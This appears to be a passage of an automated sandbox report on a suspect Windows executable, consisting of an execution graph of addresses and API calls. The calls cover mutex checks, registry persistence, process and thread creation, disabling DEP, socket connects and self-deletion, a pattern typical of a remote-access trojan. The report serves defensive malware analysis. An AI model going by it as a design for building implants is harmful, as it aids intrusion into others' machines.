                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:5.1%
                Total number of Nodes:1178
                Total number of Limit Nodes:60
                execution_graph 46333 433192 46334 43319e ___scrt_is_nonwritable_in_current_image 46333->46334 46360 432ea1 46334->46360 46336 4331a5 46338 4331ce 46336->46338 46661 433304 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 46336->46661 46346 43320d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46338->46346 46371 442b52 46338->46371 46342 4331ed ___scrt_is_nonwritable_in_current_image 46343 43326d 46379 43341f 46343->46379 46346->46343 46662 441cb7 35 API calls 5 library calls 46346->46662 46353 43328f 46354 433299 46353->46354 46664 441cef 28 API calls _abort 46353->46664 46356 4332a2 46354->46356 46665 441c92 28 API calls _abort 46354->46665 46666 433018 13 API calls 2 library calls 46356->46666 46359 4332aa 46359->46342 46361 432eaa 46360->46361 46667 43354d IsProcessorFeaturePresent 46361->46667 46363 432eb6 46668 437801 10 API calls 4 library calls 46363->46668 46365 432ebb 46370 432ebf 46365->46370 46669 4429df 46365->46669 46367 432ed6 46367->46336 46370->46336 46374 442b69 46371->46374 46372 4338bb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 46373 4331e7 46372->46373 46373->46342 46375 442af6 46373->46375 46374->46372 46376 442b25 46375->46376 46377 4338bb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 46376->46377 46378 442b4e 46377->46378 46378->46346 46735 435760 46379->46735 46382 433273 46383 442aa3 46382->46383 46737 44d8d9 46383->46737 46385 43327c 46388 40dec9 46385->46388 46386 442aac 46386->46385 46741 445095 35 API calls 46386->46741 46743 41b4c9 LoadLibraryA GetProcAddress 46388->46743 46390 40dee5 GetModuleFileNameW 46750 40e8e0 46390->46750 46392 40df01 46765 4020d6 46392->46765 46395 4020d6 28 API calls 46396 40df1f 46395->46396 46771 41a976 46396->46771 46400 40df31 46797 401e6d 46400->46797 46402 40df3a 46403 40df97 46402->46403 46404 40df4d 46402->46404 46803 401e45 46403->46803 47075 40f0f6 116 API calls 46404->47075 46407 40dfa7 46411 401e45 22 API calls 46407->46411 46408 40df5f 46409 401e45 22 API calls 46408->46409 46410 40df6b 46409->46410 47076 41047a 36 API calls __EH_prolog 46410->47076 46412 40dfc6 46411->46412 46808 4052fe 46412->46808 46415 40df7d 47077 40f0a7 77 API calls 46415->47077 46416 40dfd5 46813 408832 46416->46813 46419 40df86 47078 40e8cd 70 API calls 46419->47078 46426 401fb8 11 API calls 46428 40e42c 46426->46428 46427 401fb8 11 API calls 46429 40dfff 46427->46429 46663 441bc6 GetModuleHandleW 46428->46663 46430 401e45 22 API calls 46429->46430 46431 40e008 46430->46431 46830 401fa0 46431->46830 46433 40e013 46434 401e45 22 API calls 46433->46434 46435 40e02c 46434->46435 46436 401e45 22 API calls 46435->46436 46437 40e047 46436->46437 46438 40e0b2 46437->46438 47079 406292 46437->47079 46439 401e45 22 API calls 46438->46439 46445 40e0bf 46439->46445 46441 40e074 46442 401fc2 28 API calls 46441->46442 46443 40e080 46442->46443 46446 401fb8 11 API calls 46443->46446 46444 40e13b 46834 40c577 46444->46834 46445->46444 46447 401e45 22 API calls 46445->46447 46449 40e089 46446->46449 46450 40e0d8 46447->46450 47084 412831 RegOpenKeyExA 46449->47084 46453 40e0df OpenMutexA 46450->46453 46451 40e146 46452 40df8f 46451->46452 46837 419e1e 46451->46837 46452->46426 46455 40e0f2 WaitForSingleObject CloseHandle 46453->46455 46456 40e105 46453->46456 46455->46456 46462 412831 3 API calls 46456->46462 46459 40e161 46461 40e1b4 46459->46461 46854 406d8a 46459->46854 46460 40e86c 47165 412c91 30 API calls 46460->47165 46464 401e45 22 API calls 46461->46464 46472 40e122 46462->46472 46467 40e1bd 46464->46467 46466 40e882 47166 4119b8 65 API calls ___scrt_get_show_window_mode 46466->47166 46478 40e1c9 46467->46478 46479 40e1ce 46467->46479 46470 40e180 47088 406dac 30 API calls 46470->47088 46471 40e18a 46475 401e45 22 API calls 46471->46475 46472->46444 47087 412c91 30 API calls 46472->47087 46473 40e88c 46970 41a7b9 46473->46970 46485 40e193 46475->46485 47091 406dc9 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 46478->47091 46484 401e45 22 API calls 46479->46484 46480 40e185 47089 4068d4 97 API calls 46480->47089 46481 40e89c 46974 412d0b RegOpenKeyExW 46481->46974 46489 40e1d7 46484->46489 46485->46461 46487 40e1af 46485->46487 47090 4068d4 97 API calls 46487->47090 46492 401e45 22 API calls 46489->46492 46491 401ee9 11 API calls 46493 40e8b9 46491->46493 46494 40e1f2 46492->46494 46495 401ee9 11 API calls 46493->46495 46499 401e45 22 API calls 46494->46499 46496 40e8c2 46495->46496 46977 40d246 46496->46977 46501 40e20c 46499->46501 46503 401e45 22 API calls 46501->46503 46502 40e8cc 46504 40e226 46503->46504 46505 401e45 22 API calls 46504->46505 46507 40e23f 46505->46507 46506 40e2ac 46509 40e2bb 46506->46509 46514 40e437 ___scrt_get_show_window_mode 46506->46514 46507->46506 46508 401e45 22 API calls 46507->46508 46513 40e254 _wcslen 46508->46513 46510 40e2c4 46509->46510 46538 40e340 ___scrt_get_show_window_mode 46509->46538 46511 401e45 22 API calls 46510->46511 46512 40e2cd 46511->46512 46515 401e45 22 API calls 46512->46515 46513->46506 46516 401e45 22 API calls 46513->46516 47152 4129e0 RegOpenKeyExA RegQueryValueExA RegCloseKey 46514->47152 46517 40e2df 46515->46517 46518 40e26f 46516->46518 46520 401e45 22 API calls 46517->46520 46522 401e45 22 API calls 46518->46522 46521 40e2f1 46520->46521 46525 401e45 22 API calls 46521->46525 46523 40e284 46522->46523 47092 40cf38 46523->47092 46524 40e482 46526 401e45 22 API calls 46524->46526 46528 40e31a 46525->46528 46529 40e4a7 46526->46529 46533 401e45 22 API calls 46528->46533 46868 402073 46529->46868 46531 401ef3 28 API calls 46532 40e2a3 46531->46532 46535 401ee9 11 API calls 46532->46535 46536 40e32b 46533->46536 46535->46506 47150 40c307 45 API calls _wcslen 46536->47150 46537 40e4b9 46874 412a57 RegCreateKeyA 46537->46874 46858 412c2f 46538->46858 46543 40e3d4 ctype 46547 401e45 22 API calls 46543->46547 46544 40e33b 46544->46538 46545 401e45 22 API calls 46546 40e4db 46545->46546 46880 43a3ac 46546->46880 46548 40e3eb 46547->46548 46548->46524 46551 40e3ff 46548->46551 46553 401e45 22 API calls 46551->46553 46552 40e4f2 47153 41b6a6 86 API calls ___scrt_get_show_window_mode 46552->47153 46555 40e408 46553->46555 46554 40e515 46557 402073 28 API calls 46554->46557 46558 41a7b9 28 API calls 46555->46558 46560 40e52a 46557->46560 46561 40e414 46558->46561 46559 40e4f9 CreateThread 46559->46554 46562 402073 28 API calls 46560->46562 47151 40e991 88 API calls 46561->47151 46564 40e539 46562->46564 46884 41a04a 46564->46884 46565 40e419 46565->46524 46567 40e420 46565->46567 46567->46452 46569 401e45 22 API calls 46570 40e54a 46569->46570 46571 401e45 22 API calls 46570->46571 46572 40e55c 46571->46572 46573 401e45 22 API calls 46572->46573 46574 40e572 46573->46574 46575 401e45 22 API calls 46574->46575 46576 40e592 46575->46576 46577 43a3ac _strftime 39 API calls 46576->46577 46578 40e59f 46577->46578 46579 401e45 22 API calls 46578->46579 46580 40e5aa 46579->46580 46581 401e45 22 API calls 46580->46581 46582 40e5bb 46581->46582 46908 40949a 46582->46908 46585 401e45 22 API calls 46586 40e5d9 46585->46586 46587 40e5e5 46586->46587 46588 40e61e 46586->46588 47154 432df5 46587->47154 46590 401e45 22 API calls 46588->46590 46592 40e62e 46590->46592 46595 40e676 46592->46595 46596 40e63a 46592->46596 46593 401e45 22 API calls 46594 40e601 46593->46594 46597 40e608 CreateThread 46594->46597 46599 401e45 22 API calls 46595->46599 46598 432df5 new 22 API calls 46596->46598 46597->46588 46600 40e643 46598->46600 46601 40e67f 46599->46601 46602 401e45 22 API calls 46600->46602 46604 40e6e9 46601->46604 46605 40e68b 46601->46605 46603 40e655 46602->46603 46608 40e65c CreateThread 46603->46608 46606 401e45 22 API calls 46604->46606 46607 401e45 22 API calls 46605->46607 46611 40e6f2 46606->46611 46609 40e69b 46607->46609 46608->46595 46612 401e45 22 API calls 46609->46612 46610 40e737 46943 41a168 46610->46943 46611->46610 46614 401e45 22 API calls 46611->46614 46615 40e6b0 46612->46615 46617 40e707 46614->46617 47161 40ceec 31 API calls 46615->47161 46622 401e45 22 API calls 46617->46622 46625 40e71c 46622->46625 46623 40e6c3 46626 401ef3 28 API calls 46623->46626 46635 43a3ac _strftime 39 API calls 46625->46635 46629 40e6cf 46626->46629 46627 40e760 CreateThread 46630 40e781 46627->46630 46631 40e775 CreateThread 46627->46631 47715 40ecea 46627->47715 46628 40e75d SetProcessDEPPolicy 46628->46627 46632 401ee9 11 API calls 46629->46632 46633 40e796 46630->46633 46634 40e78a CreateThread 46630->46634 46631->46630 46636 40e6d8 CreateThread 46632->46636 46639 40e7e9 46633->46639 46640 402073 28 API calls 46633->46640 46634->46633 46637 40e729 46635->46637 46636->46604 47162 40b6dc 6 API calls 46637->47162 46967 4127e7 RegOpenKeyExA 46639->46967 46641 40e7b9 46640->46641 47163 4052dd 28 API calls 46641->47163 46646 40e80a 46648 41a7b9 28 API calls 46646->46648 46650 40e81a 46648->46650 47164 412903 31 API calls 46650->47164 46655 40e830 46656 401ee9 11 API calls 46655->46656 46659 40e83b 46656->46659 46657 40e863 DeleteFileW 46658 40e86a 46657->46658 46657->46659 46658->46473 46659->46473 46659->46657 46660 40e851 Sleep 46659->46660 46660->46659 46661->46336 46662->46343 46663->46353 46664->46354 46665->46356 46666->46359 46667->46363 46668->46365 46673 44e3e8 46669->46673 46672 43782a 8 API calls 3 library calls 46672->46370 46675 44e401 46673->46675 46677 44e405 46673->46677 46691 4338bb 46675->46691 46676 432ec8 46676->46367 46676->46672 46677->46675 46679 448526 46677->46679 46680 448532 ___scrt_is_nonwritable_in_current_image 46679->46680 46698 444189 EnterCriticalSection 46680->46698 46682 448539 46699 44ea03 46682->46699 46684 448557 46712 448573 LeaveCriticalSection std::_Lockit::~_Lockit 46684->46712 46685 448548 46685->46684 46710 4483ba 23 API calls 46685->46710 46688 448552 46711 448470 GetStdHandle GetFileType 46688->46711 46689 448568 ___scrt_is_nonwritable_in_current_image 46689->46677 46692 4338c6 IsProcessorFeaturePresent 46691->46692 46693 4338c4 46691->46693 46695 433908 46692->46695 46693->46676 46734 4338cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46695->46734 46697 4339eb 46697->46676 46698->46682 46700 44ea0f ___scrt_is_nonwritable_in_current_image 46699->46700 46701 44ea33 46700->46701 46702 44ea1c 46700->46702 46713 444189 EnterCriticalSection 46701->46713 46721 43eead 20 API calls _free 46702->46721 46705 44ea6b 46722 44ea92 LeaveCriticalSection std::_Lockit::~_Lockit 46705->46722 46707 44ea21 ___scrt_is_nonwritable_in_current_image _strftime 46707->46685 46708 44ea3f 46708->46705 46714 44e954 46708->46714 46710->46688 46711->46684 46712->46689 46713->46708 46723 4443f4 46714->46723 46716 44e966 46720 44e973 46716->46720 46730 447304 11 API calls 2 library calls 46716->46730 46719 44e9c5 46719->46708 46731 445002 20 API calls _free 46720->46731 46721->46707 46722->46707 46728 444401 ___crtLCMapStringA 46723->46728 46724 444441 46733 43eead 20 API calls _free 46724->46733 46725 44442c RtlAllocateHeap 46726 44443f 46725->46726 46725->46728 46726->46716 46728->46724 46728->46725 46732 441850 7 API calls 2 library calls 46728->46732 46730->46716 46731->46719 46732->46728 46733->46726 46734->46697 46736 433432 GetStartupInfoW 46735->46736 46736->46382 46738 44d8eb 46737->46738 46739 44d8e2 46737->46739 46738->46386 46742 44d7d8 48 API calls 4 library calls 46739->46742 46741->46386 46742->46738 46744 41b508 LoadLibraryA GetProcAddress 46743->46744 46745 41b4f8 GetModuleHandleA GetProcAddress 46743->46745 46746 41b536 GetModuleHandleA GetProcAddress 46744->46746 46747 41b526 GetModuleHandleA GetProcAddress 46744->46747 46745->46744 46748 41b562 28 API calls 46746->46748 46749 41b54e GetModuleHandleA GetProcAddress 46746->46749 46747->46746 46748->46390 46749->46748 47167 41a003 FindResourceA 46750->47167 46754 40e90a ctype 47177 402097 46754->47177 46757 401fc2 28 API calls 46758 40e930 46757->46758 46759 401fb8 11 API calls 46758->46759 46760 40e939 46759->46760 46761 43a620 new 21 API calls 46760->46761 46762 40e94a ctype 46761->46762 47183 40644c 46762->47183 46764 40e97d 46764->46392 46766 4020ec 46765->46766 46767 4023ae 11 API calls 46766->46767 46768 402106 46767->46768 46769 402549 28 API calls 46768->46769 46770 402114 46769->46770 46770->46395 47237 4020bf 46771->47237 46773 41a989 46776 41a9fb 46773->46776 46784 401fc2 28 API calls 46773->46784 46788 401fb8 11 API calls 46773->46788 46792 41a9f9 46773->46792 47241 404182 28 API calls 46773->47241 47242 41b73f 46773->47242 46774 401fb8 11 API calls 46775 41aa2b 46774->46775 46777 401fb8 11 API calls 46775->46777 47253 404182 28 API calls 46776->47253 46780 41aa33 46777->46780 46782 401fb8 11 API calls 46780->46782 46781 41aa07 46783 401fc2 28 API calls 46781->46783 46785 40df28 46782->46785 46786 41aa10 46783->46786 46784->46773 46793 40f05a 46785->46793 46787 401fb8 11 API calls 46786->46787 46789 41aa18 46787->46789 46788->46773 46790 41b73f 28 API calls 46789->46790 46790->46792 46792->46774 46794 40f066 46793->46794 46796 40f06d 46793->46796 47279 402143 11 API calls 46794->47279 46796->46400 46798 402143 46797->46798 46799 40217f 46798->46799 47280 402710 11 API calls 46798->47280 46799->46402 46801 402164 47281 4026f2 11 API calls std::_Deallocate 46801->47281 46804 401e4d 46803->46804 46805 401e55 46804->46805 47282 402138 22 API calls 46804->47282 46805->46407 46809 4020bf 11 API calls 46808->46809 46810 40530a 46809->46810 47283 403280 46810->47283 46812 405326 46812->46416 47287 4051cf 46813->47287 46815 408840 47291 402035 46815->47291 46818 401fc2 46819 401fd1 46818->46819 46820 402019 46818->46820 46821 4023ae 11 API calls 46819->46821 46827 401fb8 46820->46827 46822 401fda 46821->46822 46823 40201c 46822->46823 46825 401ff5 46822->46825 46824 40265a 11 API calls 46823->46824 46824->46820 47323 403078 28 API calls 46825->47323 46828 4023ae 11 API calls 46827->46828 46829 401fc1 46828->46829 46829->46427 46831 401fb2 46830->46831 46832 401fa9 46830->46832 46831->46433 47324 4025c0 28 API calls 46832->47324 47325 401f8b 46834->47325 46836 40c581 CreateMutexA GetLastError 46836->46451 47326 41ab12 46837->47326 46842 401fc2 28 API calls 46843 419e5a 46842->46843 46844 401fb8 11 API calls 46843->46844 46845 419e62 46844->46845 46846 419eb8 46845->46846 46847 41288e 31 API calls 46845->46847 46846->46459 46848 419e8b 46847->46848 46849 419e96 StrToIntA 46848->46849 46850 419ead 46849->46850 46851 419ea4 46849->46851 46853 401fb8 11 API calls 46850->46853 47334 41b874 22 API calls 46851->47334 46853->46846 46855 406d9e 46854->46855 46856 412831 3 API calls 46855->46856 46857 406da5 46856->46857 46857->46470 46857->46471 46859 412c4d 46858->46859 46860 40644c 28 API calls 46859->46860 46861 412c62 46860->46861 46862 4020d6 28 API calls 46861->46862 46863 412c72 46862->46863 46864 412a57 14 API calls 46863->46864 46865 412c7c 46864->46865 46866 401fb8 11 API calls 46865->46866 46867 412c89 46866->46867 46867->46543 46869 40207b 46868->46869 46870 4023ae 11 API calls 46869->46870 46871 402086 46870->46871 47335 4024cd 46871->47335 46875 412aa7 46874->46875 46876 412a70 46874->46876 46877 401fb8 11 API calls 46875->46877 46879 412a82 RegSetValueExA RegCloseKey 46876->46879 46878 40e4cf 46877->46878 46878->46545 46879->46875 46881 43a3c5 _strftime 46880->46881 47339 439703 46881->47339 46883 40e4e8 46883->46552 46883->46554 46885 41a060 GetLocalTime 46884->46885 46886 41a0fb 46884->46886 46887 4052fe 28 API calls 46885->46887 46888 401fb8 11 API calls 46886->46888 46889 41a0a2 46887->46889 46890 41a103 46888->46890 46891 408832 28 API calls 46889->46891 46892 401fb8 11 API calls 46890->46892 46893 41a0ae 46891->46893 46894 40e53e 46892->46894 47367 402ef0 46893->47367 46894->46569 46897 408832 28 API calls 46898 41a0c6 46897->46898 47372 406874 76 API calls 46898->47372 46900 41a0d4 46901 401fb8 11 API calls 46900->46901 46902 41a0e0 46901->46902 46903 401fb8 11 API calls 46902->46903 46904 41a0e9 46903->46904 46905 401fb8 11 API calls 46904->46905 46906 41a0f2 46905->46906 46907 401fb8 11 API calls 46906->46907 46907->46886 47376 401f66 46908->47376 46910 4094b1 _wcslen 46911 4094c4 46910->46911 46912 4094db 46910->46912 46913 40cf38 31 API calls 46911->46913 46914 40cf38 31 API calls 46912->46914 46915 4094cc 46913->46915 46916 4094e3 46914->46916 46917 401ef3 28 API calls 46915->46917 46918 401ef3 28 API calls 46916->46918 46942 4094d6 46917->46942 46919 4094f1 46918->46919 46920 401ee9 11 API calls 46919->46920 46921 4094f9 46920->46921 47380 4087f0 28 API calls 46921->47380 46922 401ee9 11 API calls 46924 409530 46922->46924 46926 409576 46924->46926 46927 409557 46924->46927 46925 40950b 47381 402ff4 46925->47381 47388 4086d0 28 API calls 46926->47388 46930 409574 46927->46930 47386 4086d0 28 API calls 46927->47386 46933 401ee9 11 API calls 46930->46933 46932 409584 47389 40977e 85 API calls 46932->47389 46938 409596 46933->46938 46935 40956a 47387 409835 28 API calls 46935->47387 46936 401ef3 28 API calls 46940 409520 46936->46940 46938->46585 46941 401ee9 11 API calls 46940->46941 46941->46942 46942->46922 46944 41a18b GetUserNameW 46943->46944 47435 40415e 46944->47435 46949 402ff4 28 API calls 46950 41a1cd 46949->46950 46951 401ee9 11 API calls 46950->46951 46952 41a1d6 46951->46952 46953 401ee9 11 API calls 46952->46953 46954 40e740 46953->46954 46955 401ef3 46954->46955 46956 401f02 46955->46956 46963 401f4a 46955->46963 46957 402232 11 API calls 46956->46957 46958 401f0b 46957->46958 46959 401f4d 46958->46959 46961 401f26 46958->46961 46960 402316 11 API calls 46959->46960 46960->46963 47530 40303c 28 API calls 46961->47530 46964 401ee9 46963->46964 46965 402232 11 API calls 46964->46965 46966 401ef2 46965->46966 46966->46627 46966->46628 46968 412808 RegQueryValueExA RegCloseKey 46967->46968 46969 40e801 46967->46969 46968->46969 46969->46496 46969->46646 46971 41a7cd 46970->46971 47531 40ae7e 46971->47531 46973 41a7d5 46973->46481 46975 40e8af 46974->46975 46976 412d27 RegDeleteValueW 46974->46976 46975->46491 46976->46975 46978 40d25f 46977->46978 46979 4127e7 3 API calls 46978->46979 46980 40d266 46979->46980 46981 40d285 46980->46981 47545 4016e7 46980->47545 46985 414271 46981->46985 46983 40d273 47548 412b5f RegCreateKeyA 46983->47548 46986 4020bf 11 API calls 46985->46986 46987 414285 46986->46987 47562 41a40e 46987->47562 46990 4020bf 11 API calls 46991 41429b 46990->46991 46992 401e45 22 API calls 46991->46992 46993 4142a9 46992->46993 46994 43a3ac _strftime 39 API calls 46993->46994 46995 4142b6 46994->46995 46996 4142c8 46995->46996 46997 4142bb Sleep 46995->46997 46998 402073 28 API calls 46996->46998 46997->46996 46999 4142d7 46998->46999 47000 401e45 22 API calls 46999->47000 47001 4142e0 47000->47001 47002 4020d6 28 API calls 47001->47002 47003 4142eb 47002->47003 47004 41a976 28 API calls 47003->47004 47005 4142f3 47004->47005 47566 40487e WSAStartup 47005->47566 47007 4142fd 47008 401e45 22 API calls 47007->47008 47009 414306 47008->47009 47010 401e45 22 API calls 47009->47010 47034 414385 47009->47034 47011 41431f 47010->47011 47014 401e45 22 API calls 47011->47014 47012 401e45 22 API calls 47012->47034 47013 4020d6 28 API calls 47013->47034 47015 414330 47014->47015 47017 401e45 22 API calls 47015->47017 47016 41a976 28 API calls 47016->47034 47018 414341 47017->47018 47019 401e45 22 API calls 47018->47019 47021 414352 47019->47021 47020 406292 28 API calls 47020->47034 47023 401e45 22 API calls 47021->47023 47022 401fc2 28 API calls 47022->47034 47024 414363 47023->47024 47025 401e45 22 API calls 47024->47025 47026 414375 47025->47026 47668 40471d 88 API calls 47026->47668 47029 4144d3 WSAGetLastError 47669 41b45a 30 API calls 47029->47669 47034->47012 47034->47013 47034->47016 47034->47020 47034->47022 47034->47029 47036 41a04a 79 API calls 47034->47036 47038 4052fe 28 API calls 47034->47038 47039 401e6d 11 API calls 47034->47039 47040 43a3ac _strftime 39 API calls 47034->47040 47041 408832 28 API calls 47034->47041 47043 402ef0 28 API calls 47034->47043 47044 402073 28 API calls 47034->47044 47045 401fb8 11 API calls 47034->47045 47050 41288e 31 API calls 47034->47050 47060 414702 47034->47060 47567 414230 47034->47567 47572 40480d 47034->47572 47579 404f31 47034->47579 47594 4048a8 connect 47034->47594 47654 404e06 WaitForSingleObject 47034->47654 47670 4052dd 28 API calls 47034->47670 47671 413904 50 API calls 47034->47671 47672 4086d0 28 API calls 47034->47672 47673 440751 20 API calls 47034->47673 47674 4129e0 RegOpenKeyExA RegQueryValueExA RegCloseKey 47034->47674 47036->47034 47038->47034 47039->47034 47042 414e01 Sleep 47040->47042 47041->47034 47042->47034 47043->47034 47044->47034 47045->47034 47050->47034 47051 40415e 28 API calls 47051->47060 47054 401e45 22 API calls 47055 414780 GetTickCount 47054->47055 47677 41a6e9 28 API calls 47055->47677 47058 41a6e9 28 API calls 47058->47060 47060->47034 47060->47051 47060->47054 47060->47058 47062 41a879 28 API calls 47060->47062 47064 402e81 28 API calls 47060->47064 47065 408832 28 API calls 47060->47065 47067 402ef0 28 API calls 47060->47067 47069 401fb8 11 API calls 47060->47069 47070 401ee9 11 API calls 47060->47070 47073 402073 28 API calls 47060->47073 47074 41a04a 79 API calls 47060->47074 47675 40d28d 6 API calls 47060->47675 47676 41a79d 28 API calls 47060->47676 47678 41a641 GetTickCount 47060->47678 47679 41a5f1 30 API calls ___scrt_get_show_window_mode 47060->47679 47680 40ee14 29 API calls 47060->47680 47681 402f11 28 API calls 47060->47681 47682 408853 28 API calls 47060->47682 47683 404a81 60 API calls ctype 47060->47683 47684 404bf0 111 API calls new 47060->47684 47685 40a5c4 84 API calls 47060->47685 47062->47060 47064->47060 47065->47060 47067->47060 47069->47060 47070->47060 47073->47060 47074->47060 47075->46408 47076->46415 47077->46419 47080 4020bf 11 API calls 47079->47080 47081 40629e 47080->47081 47082 403280 28 API calls 47081->47082 47083 4062bb 47082->47083 47083->46441 47085 40e0a8 47084->47085 47086 41285b RegQueryValueExA RegCloseKey 47084->47086 47085->46438 47085->46460 47086->47085 47087->46444 47088->46480 47089->46471 47090->46461 47091->46479 47093 401f66 11 API calls 47092->47093 47094 40cf54 47093->47094 47095 40cf74 47094->47095 47096 40cfa9 47094->47096 47097 40cf6a 47094->47097 47706 41a10f 29 API calls 47095->47706 47098 41ab12 GetCurrentProcess 47096->47098 47100 40d09d GetLongPathNameW 47097->47100 47102 40cfae 47098->47102 47101 40415e 28 API calls 47100->47101 47104 40d0b2 47101->47104 47105 40cfb2 47102->47105 47106 40d004 47102->47106 47103 40cf7d 47107 401ef3 28 API calls 47103->47107 47108 40415e 28 API calls 47104->47108 47110 40415e 28 API calls 47105->47110 47109 40415e 28 API calls 47106->47109 47111 40cf87 47107->47111 47112 40d0c1 47108->47112 47113 40d012 47109->47113 47114 40cfc0 47110->47114 47116 401ee9 11 API calls 47111->47116 47709 40d2d5 28 API calls 47112->47709 47119 40415e 28 API calls 47113->47119 47120 40415e 28 API calls 47114->47120 47116->47097 47117 40d0d4 47710 402f85 28 API calls 47117->47710 47122 40d028 47119->47122 47123 40cfd6 47120->47123 47121 40d0df 47711 402f85 28 API calls 47121->47711 47708 402f85 28 API calls 47122->47708 47707 402f85 28 API calls 47123->47707 47127 40d0e9 47130 401ee9 11 API calls 47127->47130 47128 40d033 47131 401ef3 28 API calls 47128->47131 47129 40cfe1 47132 401ef3 28 API calls 47129->47132 47133 40d0f3 47130->47133 47134 40d03e 47131->47134 47135 40cfec 47132->47135 47136 401ee9 11 API calls 47133->47136 47137 401ee9 11 API calls 47134->47137 47138 401ee9 11 API calls 47135->47138 47140 40d0fc 47136->47140 47141 40d047 47137->47141 47139 40cff5 47138->47139 47143 401ee9 11 API calls 47139->47143 47144 401ee9 11 API calls 47140->47144 47142 401ee9 11 API calls 47141->47142 47142->47111 47143->47111 47145 40d105 47144->47145 47146 401ee9 11 API calls 47145->47146 47147 40d10e 47146->47147 47148 401ee9 11 API calls 47147->47148 47149 40d117 47148->47149 47149->46531 47150->46544 47151->46565 47152->46524 47153->46559 47157 432dfa 47154->47157 47155 43a620 new 21 API calls 47155->47157 47156 40e5ee 47156->46593 47157->47155 47157->47156 47712 441850 7 API calls 2 library calls 47157->47712 47713 433530 RaiseException __CxxThrowException@8 new 47157->47713 47714 433513 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47157->47714 47161->46623 47162->46610 47164->46655 47165->46466 47168 41a020 LoadResource LockResource SizeofResource 47167->47168 47169 40e8fb 47167->47169 47168->47169 47170 43a620 47169->47170 47175 444a38 ___crtLCMapStringA 47170->47175 47171 444a76 47187 43eead 20 API calls _free 47171->47187 47173 444a61 RtlAllocateHeap 47174 444a74 47173->47174 47173->47175 47174->46754 47175->47171 47175->47173 47186 441850 7 API calls 2 library calls 47175->47186 47178 40209f 47177->47178 47188 4023ae 47178->47188 47180 4020aa 47192 4024ea 47180->47192 47182 4020b9 47182->46757 47184 402097 28 API calls 47183->47184 47185 406460 47184->47185 47185->46764 47186->47175 47187->47174 47189 402408 47188->47189 47190 4023b8 47188->47190 47189->47180 47190->47189 47199 402787 11 API calls std::_Deallocate 47190->47199 47193 4024fa 47192->47193 47194 402500 47193->47194 47195 402515 47193->47195 47200 402549 47194->47200 47210 4028c8 47195->47210 47198 402513 47198->47182 47199->47189 47221 402868 47200->47221 47202 40255d 47203 402572 47202->47203 47204 402587 47202->47204 47226 402a14 22 API calls 47203->47226 47206 4028c8 28 API calls 47204->47206 47209 402585 47206->47209 47207 40257b 47227 4029ba 22 API calls 47207->47227 47209->47198 47211 4028d1 47210->47211 47212 402933 47211->47212 47213 4028db 47211->47213 47235 402884 22 API calls std::_Xinvalid_argument 47212->47235 47216 4028e4 47213->47216 47217 4028f7 47213->47217 47229 402c8e 47216->47229 47219 4028f5 47217->47219 47220 4023ae 11 API calls 47217->47220 47219->47198 47220->47219 47222 402870 47221->47222 47223 402878 47222->47223 47228 402c83 22 API calls 47222->47228 47223->47202 47226->47207 47227->47209 47230 402c98 __EH_prolog 47229->47230 47236 402e34 22 API calls 47230->47236 47232 402d04 47233 4023ae 11 API calls 47232->47233 47234 402d72 47233->47234 47234->47219 47236->47232 47238 4020c7 47237->47238 47239 4023ae 11 API calls 47238->47239 47240 4020d2 47239->47240 47240->46773 47241->46773 47243 41b74c 47242->47243 47244 41b7ab 47243->47244 47249 41b75c 47243->47249 47245 41b7c5 47244->47245 47246 41b8eb 28 API calls 47244->47246 47263 41ba51 28 API calls 47245->47263 47246->47245 47248 41b794 47262 41ba51 28 API calls 47248->47262 47249->47248 47254 41b8eb 47249->47254 47250 41b7a7 47250->46773 47253->46781 47256 41b8f3 47254->47256 47255 41b925 47255->47248 47256->47255 47257 41b929 47256->47257 47260 41b90d 47256->47260 47274 402705 22 API calls std::_Xinvalid_argument 47257->47274 47264 41b95c 47260->47264 47262->47250 47263->47250 47265 41b966 __EH_prolog 47264->47265 47275 4026f7 22 API calls 47265->47275 47267 41b979 47276 41ba68 11 API calls 47267->47276 47269 41b99f 47270 41b9d7 47269->47270 47277 402710 11 API calls 47269->47277 47270->47255 47272 41b9be 47278 4026f2 11 API calls std::_Deallocate 47272->47278 47275->47267 47276->47269 47277->47272 47278->47270 47279->46796 47280->46801 47281->46799 47284 40328a 47283->47284 47285 4028c8 28 API calls 47284->47285 47286 4032a9 47284->47286 47285->47286 47286->46812 47288 4051db 47287->47288 47297 405254 47288->47297 47290 4051e8 47290->46815 47292 402041 47291->47292 47293 4023ae 11 API calls 47292->47293 47294 40205b 47293->47294 47319 40265a 47294->47319 47298 405262 47297->47298 47299 405268 47298->47299 47300 40527e 47298->47300 47308 4025d0 47299->47308 47301 4052d5 47300->47301 47302 405296 47300->47302 47317 402884 22 API calls std::_Xinvalid_argument 47301->47317 47306 4028c8 28 API calls 47302->47306 47307 40527c 47302->47307 47306->47307 47307->47290 47309 402868 22 API calls 47308->47309 47310 4025e2 47309->47310 47311 402652 47310->47311 47313 402609 47310->47313 47318 402884 22 API calls std::_Xinvalid_argument 47311->47318 47315 4028c8 28 API calls 47313->47315 47316 40261b 47313->47316 47315->47316 47316->47307 47320 40266b 47319->47320 47321 4023ae 11 API calls 47320->47321 47322 40206d 47321->47322 47322->46818 47323->46820 47324->46831 47327 419e2c 47326->47327 47328 41ab1f GetCurrentProcess 47326->47328 47329 41288e RegOpenKeyExA 47327->47329 47328->47327 47330 4128bc RegQueryValueExA RegCloseKey 47329->47330 47331 4128e6 47329->47331 47330->47331 47332 402073 28 API calls 47331->47332 47333 4128fb 47332->47333 47333->46842 47334->46850 47336 4024d9 47335->47336 47337 4024ea 28 API calls 47336->47337 47338 402091 47337->47338 47338->46537 47355 43a30a 47339->47355 47341 439750 47361 4390b7 35 API calls 3 library calls 47341->47361 47343 439715 47343->47341 47344 43972a 47343->47344 47346 43972f _strftime 47343->47346 47360 43eead 20 API calls _free 47344->47360 47346->46883 47348 43975c 47350 43978b 47348->47350 47362 43a34f 39 API calls __Toupper 47348->47362 47349 4397f7 47364 43a2b6 20 API calls 2 library calls 47349->47364 47350->47349 47363 43a2b6 20 API calls 2 library calls 47350->47363 47353 